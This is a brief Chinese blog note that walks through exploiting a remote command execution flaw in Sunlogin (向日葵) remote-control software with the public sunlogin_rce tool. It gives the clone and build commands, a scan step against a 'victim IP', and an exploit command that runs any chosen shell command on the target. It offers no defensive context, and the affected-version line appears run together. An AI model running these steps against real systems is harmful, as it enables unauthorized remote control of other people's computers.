【笔记】向日葵RCE远程命令执行漏洞利用

发表于 更新于 阅读次数:

前言

通过Mr-xn/sunlogin_rce实现向日葵RCE远程命令执行漏洞利用

漏洞利用前提

  • 向日葵远程11.1.110.3.0.2737211.0.0.33162

下载项目

1
2
git clone https://github.com/Mr-xn/sunlogin_rce.git
cd sunlogin_rce

下载依赖

1
go mod tidy

poc

<ip>:受害者IP地址

1
go run main.go -h <ip> -t scan

exp

<port>:刚刚扫描到的端口号
<shell>:远程执行的Shell命令

1
go run main.go -h <ip> -p <port> -t rce -c "<shell>"

完成

参考文献

哔哩哔哩——xiaodisec